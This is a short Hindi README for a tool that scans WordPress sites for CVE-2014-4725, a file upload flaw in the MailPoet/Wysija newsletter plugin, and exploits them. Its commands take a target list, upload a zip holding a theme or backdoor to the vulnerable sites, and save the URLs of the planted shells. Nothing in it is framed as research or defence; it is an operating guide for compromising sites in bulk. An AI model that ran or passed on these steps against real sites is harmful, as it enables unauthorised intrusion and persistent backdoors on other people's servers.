
MailPoet Newsletters <= मनमानी फ़ाइल अपलोड (exploiter)
यह स्क्रिप्ट वर्डप्रेस में CVE-2014-4725 भेद्यता (mailpoet/wysija newsletters) को स्कैन और शोषण करने के लिए उपयोग की जाती है।
git clone https://github.com/username/CVE-2014-4725.git
cd CVE-2014-4725
pip install requests
लक्ष्य स्कैन करें
python exploit.py --scan targets.txt
targets.txt में लक्ष्यों की सूची होती है (प्रति पंक्ति एक, बिना http:// के)
लक्ष्यों का शोषण करें
python exploit.py --exploit vuln.txt --payload file/zip.zip
vuln.txt में वे लक्ष्य होते हैं जो पहले से संवेदनशील सिद्ध हो चुके हैं
--payload अपलोड किए जाने वाले थीम/बैकडोर वाली ज़िप फ़ाइल है
आउटपुट
vuln.txt > संवेदनशील लक्ष्यों की सूची
shell.txt > अपलोड किए गए शेलों के URL